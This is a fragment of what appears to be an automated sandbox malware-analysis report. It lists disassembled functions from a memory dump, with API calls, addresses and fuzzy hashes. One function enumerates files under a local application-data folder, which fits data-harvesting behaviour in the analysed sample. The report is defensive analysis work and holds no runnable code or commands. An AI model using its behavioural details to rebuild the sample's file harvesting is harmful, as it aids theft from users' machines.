                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: cc55fc2fdb5c2fcb0dbf9b9e48e74a14f64c4874e9a7b593f0ee3a523da157fb
                                    • Instruction ID: f3fd3e75f7db682c939d78838bc5606d51503f3f8ca8ff5e917ad590e0bb4881
                                    • Opcode Fuzzy Hash: cc55fc2fdb5c2fcb0dbf9b9e48e74a14f64c4874e9a7b593f0ee3a523da157fb
                                    • Instruction Fuzzy Hash: AFF08C38E00208FBEB10DBB1DC08B9E77B9EB48311F108654BA11A72D0DA749A00DB40
                                    Function 0095C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 0095C74E
                                      • Part of subcall function 0095BF9F: __amsg_exit.LIBCMT ref: 0095BFAF
                                    • __getptd.LIBCMT ref: 0095C765
                                    • __amsg_exit.LIBCMT ref: 0095C773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0095C797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: edc6832a2f14babed69f041fbe2e598602ceeca0c5f9940aeccb4259f880f6e5
                                    • Instruction ID: 37d7c7c5ab859e2058f87f829c535cd93ed0c76d70f3cf309fd985f1eda1eec9
                                    • Opcode Fuzzy Hash: edc6832a2f14babed69f041fbe2e598602ceeca0c5f9940aeccb4259f880f6e5
                                    • Instruction Fuzzy Hash: 71F0B4729047109FD720FBBA580774D33E06F84727F244149FC14F65D2DB6459889F56
                                    Function 00954F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00958DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00958E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954F7A
                                    • lstrcat.KERNEL32(?,00961070), ref: 00954F97
                                    • lstrcat.KERNEL32(?,015E8AA0), ref: 00954FAB
                                    • lstrcat.KERNEL32(?,00961074), ref: 00954FBD
                                      • Part of subcall function 00954910: wsprintfA.USER32 ref: 0095492C
                                      • Part of subcall function 00954910: FindFirstFileA.KERNEL32(?,?), ref: 00954943
                                      • Part of subcall function 00954910: StrCmpCA.SHLWAPI(?,00960FDC), ref: 00954971
                                      • Part of subcall function 00954910: StrCmpCA.SHLWAPI(?,00960FE0), ref: 00954987
                                      • Part of subcall function 00954910: FindNextFileA.KERNEL32(000000FF,?), ref: 00954B7D
                                      • Part of subcall function 00954910: FindClose.KERNEL32(000000FF), ref: 00954B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 55e1df81d840072589af4a2ef86b5c596966a1adfef51d049b8d4dce88eb637a
                                    • Instruction ID: 8068874edc18d9f8546f14b2d10feee1c21f82ff732833ec41e5c7e824dc0242
                                    • Opcode Fuzzy Hash: 55e1df81d840072589af4a2ef86b5c596966a1adfef51d049b8d4dce88eb637a
                                    • Instruction Fuzzy Hash: 5B21A776900208A7DB54FBB0DC46FEE337CABD4701F004559BA5993191EE74AACDCBA2